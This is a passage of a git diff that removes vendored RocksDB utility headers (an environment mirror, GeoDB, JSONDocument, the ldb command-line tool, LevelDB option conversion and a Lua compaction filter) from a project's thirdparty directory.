-// existing, stable Env, like the default POSIX one).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <iostream>
-#include <algorithm>
-#include <vector>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-class SequentialFileMirror;
-class RandomAccessFileMirror;
-class WritableFileMirror;
-
-class EnvMirror : public EnvWrapper {
-  Env* a_, *b_;
-  bool free_a_, free_b_;
-
- public:
-  EnvMirror(Env* a, Env* b, bool free_a=false, bool free_b=false)
-    : EnvWrapper(a),
-      a_(a),
-      b_(b),
-      free_a_(free_a),
-      free_b_(free_b) {}
-  ~EnvMirror() {
-    if (free_a_)
-      delete a_;
-    if (free_b_)
-      delete b_;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override;
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override;
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override;
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           unique_ptr<WritableFile>* r,
-                           const EnvOptions& options) override;
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    unique_ptr<Directory> br;
-    Status as = a_->NewDirectory(name, result);
-    Status bs = b_->NewDirectory(name, &br);
-    assert(as == bs);
-    return as;
-  }
-  Status FileExists(const std::string& f) override {
-    Status as = a_->FileExists(f);
-    Status bs = b_->FileExists(f);
-    assert(as == bs);
-    return as;
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    std::vector<std::string> ar, br;
-    Status as = a_->GetChildren(dir, &ar);
-    Status bs = b_->GetChildren(dir, &br);
-    assert(as == bs);
-    std::sort(ar.begin(), ar.end());
-    std::sort(br.begin(), br.end());
-    if (!as.ok() || ar != br) {
-      assert(0 == "getchildren results don't match");
-    }
-    *r = ar;
-    return as;
-  }
-  Status DeleteFile(const std::string& f) override {
-    Status as = a_->DeleteFile(f);
-    Status bs = b_->DeleteFile(f);
-    assert(as == bs);
-    return as;
-  }
-  Status CreateDir(const std::string& d) override {
-    Status as = a_->CreateDir(d);
-    Status bs = b_->CreateDir(d);
-    assert(as == bs);
-    return as;
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    Status as = a_->CreateDirIfMissing(d);
-    Status bs = b_->CreateDirIfMissing(d);
-    assert(as == bs);
-    return as;
-  }
-  Status DeleteDir(const std::string& d) override {
-    Status as = a_->DeleteDir(d);
-    Status bs = b_->DeleteDir(d);
-    assert(as == bs);
-    return as;
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    uint64_t asize, bsize;
-    Status as = a_->GetFileSize(f, &asize);
-    Status bs = b_->GetFileSize(f, &bsize);
-    assert(as == bs);
-    assert(!as.ok() || asize == bsize);
-    *s = asize;
-    return as;
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    uint64_t amtime, bmtime;
-    Status as = a_->GetFileModificationTime(fname, &amtime);
-    Status bs = b_->GetFileModificationTime(fname, &bmtime);
-    assert(as == bs);
-    assert(!as.ok() || amtime - bmtime < 10000 || bmtime - amtime < 10000);
-    *file_mtime = amtime;
-    return as;
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    Status as = a_->RenameFile(s, t);
-    Status bs = b_->RenameFile(s, t);
-    assert(as == bs);
-    return as;
-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    Status as = a_->LinkFile(s, t);
-    Status bs = b_->LinkFile(s, t);
-    assert(as == bs);
-    return as;
-  }
-
-  class FileLockMirror : public FileLock {
-   public:
-    FileLock* a_, *b_;
-    FileLockMirror(FileLock* a, FileLock* b) : a_(a), b_(b) {}
-  };
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    FileLock* al, *bl;
-    Status as = a_->LockFile(f, &al);
-    Status bs = b_->LockFile(f, &bl);
-    assert(as == bs);
-    if (as.ok()) *l = new FileLockMirror(al, bl);
-    return as;
-  }
-
-  Status UnlockFile(FileLock* l) override {
-    FileLockMirror* ml = static_cast<FileLockMirror*>(l);
-    Status as = a_->UnlockFile(ml->a_);
-    Status bs = b_->UnlockFile(ml->b_);
-    assert(as == bs);
-    delete ml;
-    return as;
-  }
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h
deleted file mode 100644
index 408774c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/geo_db.h
+++ /dev/null
@@ -1,114 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-//
-// Configurable options needed for setting up a Geo database
-//
-struct GeoDBOptions {
-  // Backup info and error messages will be written to info_log
-  // if non-nullptr.
-  // Default: nullptr
-  Logger* info_log;
-
-  explicit GeoDBOptions(Logger* _info_log = nullptr):info_log(_info_log) { }
-};
-
-//
-// A position in the earth's geoid
-//
-class GeoPosition {
- public:
-  double latitude;
-  double longitude;
-
-  explicit GeoPosition(double la = 0, double lo = 0) :
-    latitude(la), longitude(lo) {
-  }
-};
-
-//
-// Description of an object on the Geoid. It is located by a GPS location,
-// and is identified by the id. The value associated with this object is
-// an opaque string 'value'. Different objects identified by unique id's
-// can have the same gps-location associated with them.
-//
-class GeoObject {
- public:
-  GeoPosition position;
-  std::string id;
-  std::string value;
-
-  GeoObject() {}
-
-  GeoObject(const GeoPosition& pos, const std::string& i,
-            const std::string& val) :
-    position(pos), id(i), value(val) {
-  }
-};
-
-class GeoIterator {
- public:
-  GeoIterator() = default;
-  virtual ~GeoIterator() {}
-  virtual void Next() = 0;
-  virtual bool Valid() const = 0;
-  virtual const GeoObject& geo_object() = 0;
-  virtual Status status() const = 0;
-};
-
-//
-// Stack your DB with GeoDB to be able to get geo-spatial support
-//
-class GeoDB : public StackableDB {
- public:
-  // GeoDBOptions have to be the same as the ones used in a previous
-  // incarnation of the DB
-  //
-  // GeoDB owns the pointer `DB* db` now. You should not delete it or
-  // use it after the invocation of GeoDB
-  // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {}
-  GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {}
-  virtual ~GeoDB() {}
-
-  // Insert a new object into the location database. The object is
-  // uniquely identified by the id. If an object with the same id already
-  // exists in the db, then the old one is overwritten by the new
-  // object being inserted here.
-  virtual Status Insert(const GeoObject& object) = 0;
-
-  // Retrieve the value of the object located at the specified GPS
-  // location and is identified by the 'id'.
-  virtual Status GetByPosition(const GeoPosition& pos,
-                               const Slice& id, std::string* value) = 0;
-
-  // Retrieve the value of the object identified by the 'id'. This method
-  // could be potentially slower than GetByPosition
-  virtual Status GetById(const Slice& id, GeoObject*  object) = 0;
-
-  // Delete the specified object
-  virtual Status Remove(const Slice& id) = 0;
-
-  // Returns an iterator for the items within a circular radius from the
-  // specified gps location. If 'number_of_values' is specified,
-  // then the iterator is capped to that number of objects.
-  // The radius is specified in 'meters'.
-  virtual GeoIterator* SearchRadial(const GeoPosition& pos,
-                                    double radius,
-                                    int number_of_values = INT_MAX) = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h b/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h
deleted file mode 100644
index 6df056f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/info_log_finder.h
+++ /dev/null
@@ -1,19 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-// This function can be used to list the Information logs,
-// given the db pointer.
-Status GetInfoLogList(DB* db, std::vector<std::string>* info_log_list);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h b/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h
deleted file mode 100644
index 5d841f9..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/json_document.h
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <deque>
-#include <map>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/slice.h"
-
-// We use JSONDocument for DocumentDB API
-// Implementation inspired by folly::dynamic, rapidjson and fbson
-
-namespace fbson {
-  class FbsonValue;
-  class ObjectVal;
-  template <typename T>
-  class FbsonWriterT;
-  class FbsonOutStream;
-  typedef FbsonWriterT<FbsonOutStream> FbsonWriter;
-}  // namespace fbson
-
-namespace rocksdb {
-
-// NOTE: none of this is thread-safe
-class JSONDocument {
- public:
-  // return nullptr on parse failure
-  static JSONDocument* ParseJSON(const char* json);
-
-  enum Type {
-    kNull,
-    kArray,
-    kBool,
-    kDouble,
-    kInt64,
-    kObject,
-    kString,
-  };
-
-  /* implicit */ JSONDocument();  // null
-  /* implicit */ JSONDocument(bool b);
-  /* implicit */ JSONDocument(double d);
-  /* implicit */ JSONDocument(int8_t i);
-  /* implicit */ JSONDocument(int16_t i);
-  /* implicit */ JSONDocument(int32_t i);
-  /* implicit */ JSONDocument(int64_t i);
-  /* implicit */ JSONDocument(const std::string& s);
-  /* implicit */ JSONDocument(const char* s);
-  // constructs JSONDocument of specific type with default value
-  explicit JSONDocument(Type _type);
-
-  JSONDocument(const JSONDocument& json_document);
-
-  JSONDocument(JSONDocument&& json_document);
-
-  Type type() const;
-
-  // REQUIRES: IsObject()
-  bool Contains(const std::string& key) const;
-  // REQUIRES: IsObject()
-  // Returns non-owner object
-  JSONDocument operator[](const std::string& key) const;
-
-  // REQUIRES: IsArray() == true || IsObject() == true
-  size_t Count() const;
-
-  // REQUIRES: IsArray()
-  // Returns non-owner object
-  JSONDocument operator[](size_t i) const;
-
-  JSONDocument& operator=(JSONDocument jsonDocument);
-
-  bool IsNull() const;
-  bool IsArray() const;
-  bool IsBool() const;
-  bool IsDouble() const;
-  bool IsInt64() const;
-  bool IsObject() const;
-  bool IsString() const;
-
-  // REQUIRES: IsBool() == true
-  bool GetBool() const;
-  // REQUIRES: IsDouble() == true
-  double GetDouble() const;
-  // REQUIRES: IsInt64() == true
-  int64_t GetInt64() const;
-  // REQUIRES: IsString() == true
-  std::string GetString() const;
-
-  bool operator==(const JSONDocument& rhs) const;
-
-  bool operator!=(const JSONDocument& rhs) const;
-
-  JSONDocument Copy() const;
-
-  bool IsOwner() const;
-
-  std::string DebugString() const;
-
- private:
-  class ItemsIteratorGenerator;
-
- public:
-  // REQUIRES: IsObject()
-  ItemsIteratorGenerator Items() const;
-
-  // appends serialized object to dst
-  void Serialize(std::string* dst) const;
-  // returns nullptr if Slice doesn't represent valid serialized JSONDocument
-  static JSONDocument* Deserialize(const Slice& src);
-
- private:
-  friend class JSONDocumentBuilder;
-
-  JSONDocument(fbson::FbsonValue* val, bool makeCopy);
-
-  void InitFromValue(const fbson::FbsonValue* val);
-
-  // iteration on objects
-  class const_item_iterator {
-   private:
-    class Impl;
-   public:
-    typedef std::pair<std::string, JSONDocument> value_type;
-    explicit const_item_iterator(Impl* impl);
-    const_item_iterator(const_item_iterator&&);
-    const_item_iterator& operator++();
-    bool operator!=(const const_item_iterator& other);
-    value_type operator*();
-    ~const_item_iterator();
-   private:
-    friend class ItemsIteratorGenerator;
-    std::unique_ptr<Impl> it_;
-  };
-
-  class ItemsIteratorGenerator {
-   public:
-    explicit ItemsIteratorGenerator(const fbson::ObjectVal& object);
-    const_item_iterator begin() const;
-
-    const_item_iterator end() const;
-
-   private:
-    const fbson::ObjectVal& object_;
-  };
-
-  std::unique_ptr<char[]> data_;
-  mutable fbson::FbsonValue* value_;
-
-  // Our serialization format's first byte specifies the encoding version. That
-  // way, we can easily change our format while providing backwards
-  // compatibility. This constant specifies the current version of the
-  // serialization format
-  static const char kSerializationFormatVersion;
-};
-
-class JSONDocumentBuilder {
- public:
-  JSONDocumentBuilder();
-
-  explicit JSONDocumentBuilder(fbson::FbsonOutStream* out);
-
-  void Reset();
-
-  bool WriteStartArray();
-
-  bool WriteEndArray();
-
-  bool WriteStartObject();
-
-  bool WriteEndObject();
-
-  bool WriteKeyValue(const std::string& key, const JSONDocument& value);
-
-  bool WriteJSONDocument(const JSONDocument& value);
-
-  JSONDocument GetJSONDocument();
-
-  ~JSONDocumentBuilder();
-
- private:
-  std::unique_ptr<fbson::FbsonWriter> writer_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h b/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h
deleted file mode 100644
index b9eb103..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd.h
+++ /dev/null
@@ -1,260 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <functional>
-#include <map>
-#include <sstream>
-#include <string>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/ldb_tool.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/utilities/ldb_cmd_execute_result.h"
-
-namespace rocksdb {
-
-class LDBCommand {
- public:
-  // Command-line arguments
-  static const std::string ARG_DB;
-  static const std::string ARG_PATH;
-  static const std::string ARG_HEX;
-  static const std::string ARG_KEY_HEX;
-  static const std::string ARG_VALUE_HEX;
-  static const std::string ARG_CF_NAME;
-  static const std::string ARG_TTL;
-  static const std::string ARG_TTL_START;
-  static const std::string ARG_TTL_END;
-  static const std::string ARG_TIMESTAMP;
-  static const std::string ARG_TRY_LOAD_OPTIONS;
-  static const std::string ARG_IGNORE_UNKNOWN_OPTIONS;
-  static const std::string ARG_FROM;
-  static const std::string ARG_TO;
-  static const std::string ARG_MAX_KEYS;
-  static const std::string ARG_BLOOM_BITS;
-  static const std::string ARG_FIX_PREFIX_LEN;
-  static const std::string ARG_COMPRESSION_TYPE;
-  static const std::string ARG_COMPRESSION_MAX_DICT_BYTES;
-  static const std::string ARG_BLOCK_SIZE;
-  static const std::string ARG_AUTO_COMPACTION;
-  static const std::string ARG_DB_WRITE_BUFFER_SIZE;
-  static const std::string ARG_WRITE_BUFFER_SIZE;
-  static const std::string ARG_FILE_SIZE;
-  static const std::string ARG_CREATE_IF_MISSING;
-  static const std::string ARG_NO_VALUE;
-
-  struct ParsedParams {
-    std::string cmd;
-    std::vector<std::string> cmd_params;
-    std::map<std::string, std::string> option_map;
-    std::vector<std::string> flags;
-  };
-
-  static LDBCommand* SelectCommand(const ParsedParams& parsed_parms);
-
-  static LDBCommand* InitFromCmdLineArgs(
-      const std::vector<std::string>& args, const Options& options,
-      const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families,
-      const std::function<LDBCommand*(const ParsedParams&)>& selector =
-          SelectCommand);
-
-  static LDBCommand* InitFromCmdLineArgs(
-      int argc, char** argv, const Options& options,
-      const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families);
-
-  bool ValidateCmdLineOptions();
-
-  virtual Options PrepareOptionsForOpenDB();
-
-  virtual void SetDBOptions(Options options) { options_ = options; }
-
-  virtual void SetColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>* column_families) {
-    if (column_families != nullptr) {
-      column_families_ = *column_families;
-    } else {
-      column_families_.clear();
-    }
-  }
-
-  void SetLDBOptions(const LDBOptions& ldb_options) {
-    ldb_options_ = ldb_options;
-  }
-
-  virtual bool NoDBOpen() { return false; }
-
-  virtual ~LDBCommand() { CloseDB(); }
-
-  /* Run the command, and return the execute result. */
-  void Run();
-
-  virtual void DoCommand() = 0;
-
-  LDBCommandExecuteResult GetExecuteState() { return exec_state_; }
-
-  void ClearPreviousRunState() { exec_state_.Reset(); }
-
-  // Consider using Slice::DecodeHex directly instead if you don't need the
-  // 0x prefix
-  static std::string HexToString(const std::string& str);
-
-  // Consider using Slice::ToString(true) directly instead if
-  // you don't need the 0x prefix
-  static std::string StringToHex(const std::string& str);
-
-  static const char* DELIM;
-
- protected:
-  LDBCommandExecuteResult exec_state_;
-  std::string db_path_;
-  std::string column_family_name_;
-  DB* db_;
-  DBWithTTL* db_ttl_;
-  std::map<std::string, ColumnFamilyHandle*> cf_handles_;
-
-  /**
-   * true implies that this command can work if the db is opened in read-only
-   * mode.
-   */
-  bool is_read_only_;
-
-  /** If true, the key is input/output as hex in get/put/scan/delete etc. */
-  bool is_key_hex_;
-
-  /** If true, the value is input/output as hex in get/put/scan/delete etc. */
-  bool is_value_hex_;
-
-  /** If true, the value is treated as timestamp suffixed */
-  bool is_db_ttl_;
-
-  // If true, the kvs are output with their insert/modify timestamp in a ttl db
-  bool timestamp_;
-
-  // If true, try to construct options from DB's option files.
-  bool try_load_options_;
-
-  bool ignore_unknown_options_;
-
-  bool create_if_missing_;
-
-  /**
-   * Map of options passed on the command-line.
-   */
-  const std::map<std::string, std::string> option_map_;
-
-  /**
-   * Flags passed on the command-line.
-   */
-  const std::vector<std::string> flags_;
-
-  /** List of command-line options valid for this command */
-  const std::vector<std::string> valid_cmd_line_options_;
-
-  bool ParseKeyValue(const std::string& line, std::string* key,
-                     std::string* value, bool is_key_hex, bool is_value_hex);
-
-  LDBCommand(const std::map<std::string, std::string>& options,
-             const std::vector<std::string>& flags, bool is_read_only,
-             const std::vector<std::string>& valid_cmd_line_options);
-
-  void OpenDB();
-
-  void CloseDB();
-
-  ColumnFamilyHandle* GetCfHandle();
-
-  static std::string PrintKeyValue(const std::string& key,
-                                   const std::string& value, bool is_key_hex,
-                                   bool is_value_hex);
-
-  static std::string PrintKeyValue(const std::string& key,
-                                   const std::string& value, bool is_hex);
-
-  /**
-   * Return true if the specified flag is present in the specified flags vector
-   */
-  static bool IsFlagPresent(const std::vector<std::string>& flags,
-                            const std::string& flag) {
-    return (std::find(flags.begin(), flags.end(), flag) != flags.end());
-  }
-
-  static std::string HelpRangeCmdArgs();
-
-  /**
-   * A helper function that returns a list of command line options
-   * used by this command.  It includes the common options and the ones
-   * passed in.
-   */
-  static std::vector<std::string> BuildCmdLineOptions(
-      std::vector<std::string> options);
-
-  bool ParseIntOption(const std::map<std::string, std::string>& options,
-                      const std::string& option, int& value,
-                      LDBCommandExecuteResult& exec_state);
-
-  bool ParseStringOption(const std::map<std::string, std::string>& options,
-                         const std::string& option, std::string* value);
-
-  Options options_;
-  std::vector<ColumnFamilyDescriptor> column_families_;
-  LDBOptions ldb_options_;
-
- private:
-  /**
-   * Interpret command line options and flags to determine if the key
-   * should be input/output in hex.
-   */
-  bool IsKeyHex(const std::map<std::string, std::string>& options,
-                const std::vector<std::string>& flags);
-
-  /**
-   * Interpret command line options and flags to determine if the value
-   * should be input/output in hex.
-   */
-  bool IsValueHex(const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  /**
-   * Returns the value of the specified option as a boolean.
-   * default_val is used if the option is not found in options.
-   * Throws an exception if the value of the option is not
-   * "true" or "false" (case insensitive).
-   */
-  bool ParseBooleanOption(const std::map<std::string, std::string>& options,
-                          const std::string& option, bool default_val);
-
-  /**
-   * Converts val to a boolean.
-   * val must be either true or false (case insensitive).
-   * Otherwise an exception is thrown.
-   */
-  bool StringToBool(std::string val);
-};
-
-class LDBCommandRunner {
- public:
-  static void PrintHelp(const LDBOptions& ldb_options, const char* exec_name);
-
-  static void RunCommand(
-      int argc, char** argv, Options options, const LDBOptions& ldb_options,
-      const std::vector<ColumnFamilyDescriptor>* column_families);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h b/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h
deleted file mode 100644
index 5ddc6fe..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/ldb_cmd_execute_result.h
+++ /dev/null
@@ -1,75 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifdef FAILED
-#undef FAILED
-#endif
-
-namespace rocksdb {
-
-class LDBCommandExecuteResult {
-public:
-  enum State {
-    EXEC_NOT_STARTED = 0, EXEC_SUCCEED = 1, EXEC_FAILED = 2,
-  };
-
-  LDBCommandExecuteResult() : state_(EXEC_NOT_STARTED), message_("") {}
-
-  LDBCommandExecuteResult(State state, std::string& msg) :
-    state_(state), message_(msg) {}
-
-  std::string ToString() {
-    std::string ret;
-    switch (state_) {
-    case EXEC_SUCCEED:
-      break;
-    case EXEC_FAILED:
-      ret.append("Failed: ");
-      break;
-    case EXEC_NOT_STARTED:
-      ret.append("Not started: ");
-    }
-    if (!message_.empty()) {
-      ret.append(message_);
-    }
-    return ret;
-  }
-
-  void Reset() {
-    state_ = EXEC_NOT_STARTED;
-    message_ = "";
-  }
-
-  bool IsSucceed() {
-    return state_ == EXEC_SUCCEED;
-  }
-
-  bool IsNotStarted() {
-    return state_ == EXEC_NOT_STARTED;
-  }
-
-  bool IsFailed() {
-    return state_ == EXEC_FAILED;
-  }
-
-  static LDBCommandExecuteResult Succeed(std::string msg) {
-    return LDBCommandExecuteResult(EXEC_SUCCEED, msg);
-  }
-
-  static LDBCommandExecuteResult Failed(std::string msg) {
-    return LDBCommandExecuteResult(EXEC_FAILED, msg);
-  }
-
-private:
-  State state_;
-  std::string message_;
-
-  bool operator==(const LDBCommandExecuteResult&);
-  bool operator!=(const LDBCommandExecuteResult&);
-};
-
-}
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h b/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h
deleted file mode 100644
index fb5a440..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/leveldb_options.h
+++ /dev/null
@@ -1,144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stddef.h>
-
-namespace rocksdb {
-
-class Cache;
-class Comparator;
-class Env;
-class FilterPolicy;
-class Logger;
-struct Options;
-class Snapshot;
-
-enum CompressionType : unsigned char;
-
-// Options to control the behavior of a database (passed to
-// DB::Open). A LevelDBOptions object can be initialized as though
-// it were a LevelDB Options object, and then it can be converted into
-// a RocksDB Options object.
-struct LevelDBOptions {
-  // -------------------
-  // Parameters that affect behavior
-
-  // Comparator used to define the order of keys in the table.
-  // Default: a comparator that uses lexicographic byte-wise ordering
-  //
-  // REQUIRES: The client must ensure that the comparator supplied
-  // here has the same name and orders keys *exactly* the same as the
-  // comparator provided to previous open calls on the same DB.
-  const Comparator* comparator;
-
-  // If true, the database will be created if it is missing.
-  // Default: false
-  bool create_if_missing;
-
-  // If true, an error is raised if the database already exists.
-  // Default: false
-  bool error_if_exists;
-
-  // If true, the implementation will do aggressive checking of the
-  // data it is processing and will stop early if it detects any
-  // errors.  This may have unforeseen ramifications: for example, a
-  // corruption of one DB entry may cause a large number of entries to
-  // become unreadable or for the entire DB to become unopenable.
-  // Default: false
-  bool paranoid_checks;
-
-  // Use the specified object to interact with the environment,
-  // e.g. to read/write files, schedule background work, etc.
-  // Default: Env::Default()
-  Env* env;
-
-  // Any internal progress/error information generated by the db will
-  // be written to info_log if it is non-NULL, or to a file stored
-  // in the same directory as the DB contents if info_log is NULL.
-  // Default: NULL
-  Logger* info_log;
-
-  // -------------------
-  // Parameters that affect performance
-
-  // Amount of data to build up in memory (backed by an unsorted log
-  // on disk) before converting to a sorted on-disk file.
-  //
-  // Larger values increase performance, especially during bulk loads.
-  // Up to two write buffers may be held in memory at the same time,
-  // so you may wish to adjust this parameter to control memory usage.
-  // Also, a larger write buffer will result in a longer recovery time
-  // the next time the database is opened.
-  //
-  // Default: 4MB
-  size_t write_buffer_size;
-
-  // Number of open files that can be used by the DB.  You may need to
-  // increase this if your database has a large working set (budget
-  // one open file per 2MB of working set).
-  //
-  // Default: 1000
-  int max_open_files;
-
-  // Control over blocks (user data is stored in a set of blocks, and
-  // a block is the unit of reading from disk).
-
-  // If non-NULL, use the specified cache for blocks.
-  // If NULL, leveldb will automatically create and use an 8MB internal cache.
-  // Default: NULL
-  Cache* block_cache;
-
-  // Approximate size of user data packed per block.  Note that the
-  // block size specified here corresponds to uncompressed data.  The
-  // actual size of the unit read from disk may be smaller if
-  // compression is enabled.  This parameter can be changed dynamically.
-  //
-  // Default: 4K
-  size_t block_size;
-
-  // Number of keys between restart points for delta encoding of keys.
-  // This parameter can be changed dynamically.  Most clients should
-  // leave this parameter alone.
-  //
-  // Default: 16
-  int block_restart_interval;
-
-  // Compress blocks using the specified compression algorithm.  This
-  // parameter can be changed dynamically.
-  //
-  // Default: kSnappyCompression, which gives lightweight but fast
-  // compression.
-  //
-  // Typical speeds of kSnappyCompression on an Intel(R) Core(TM)2 2.4GHz:
-  //    ~200-500MB/s compression
-  //    ~400-800MB/s decompression
-  // Note that these speeds are significantly faster than most
-  // persistent storage speeds, and therefore it is typically never
-  // worth switching to kNoCompression.  Even if the input data is
-  // incompressible, the kSnappyCompression implementation will
-  // efficiently detect that and will switch to uncompressed mode.
-  CompressionType compression;
-
-  // If non-NULL, use the specified filter policy to reduce disk reads.
-  // Many applications will benefit from passing the result of
-  // NewBloomFilterPolicy() here.
-  //
-  // Default: NULL
-  const FilterPolicy* filter_policy;
-
-  // Create a LevelDBOptions object with default values for all fields.
-  LevelDBOptions();
-};
-
-// Converts a LevelDBOptions object into a RocksDB Options object.
-Options ConvertOptions(const LevelDBOptions& leveldb_options);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h b/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
deleted file mode 100644
index a7af592..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if defined(LUA) && !defined(ROCKSDB_LITE)
-// lua headers
-extern "C" {
-#include <lauxlib.h>
-#include <lua.h>
-#include <lualib.h>
-}
-
-#include <mutex>
-#include <string>
-#include <vector>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/lua/rocks_lua_custom_library.h"
-#include "rocksdb/utilities/lua/rocks_lua_util.h"
-
-namespace rocksdb {
-namespace lua {
-
-struct RocksLuaCompactionFilterOptions {
-  // The lua script in string that implements all necessary CompactionFilter
-  // virtual functions.  The specified lua_script must implement the following
-  // functions, which are Name and Filter, as described below.
-  //
-  // 0. The Name function simply returns a string representing the name of
-  //    the lua script.  If there's any erorr in the Name function, an
-  //    empty string will be used.
-  //    --- Example
-  //      function Name()
-  //        return "DefaultLuaCompactionFilter"
-  //      end
-  //
-  //
-  // 1. The script must contains a function called Filter, which implements
-  //    CompactionFilter::Filter() , takes three input arguments, and returns
-  //    three values as the following API:
-  //
-  //   function Filter(level, key, existing_value)
-  //     ...
-  //     return is_filtered, is_changed, new_value
-  //   end
-  //
-  //   Note that if ignore_value is set to true, then Filter should implement
-  //   the following API:
-  //
-  //   function Filter(level, key)
-  //     ...
-  //     return is_filtered
-  //   end
-  //
-  //   If there're any error in the Filter() function, then it will keep
-  //   the input key / value pair.
-  //
-  //   -- Input
-  //   The function must take three arguments (integer, string, string),
-  //   which map to "level", "key", and "existing_value" passed from
-  //   RocksDB.
-  //
-  //   -- Output
-  //   The function must return three values (boolean, boolean, string).
-  //     - is_filtered: if the first return value is true, then it indicates
-  //       the input key / value pair should be filtered.
-  //     - is_changed: if the second return value is true, then it indicates
-  //       the existing_value needs to be changed, and the resulting value
-  //       is stored in the third return value.
-  //     - new_value: if the second return value is true, then this third
-  //       return value stores the new value of the input key / value pair.
-  //
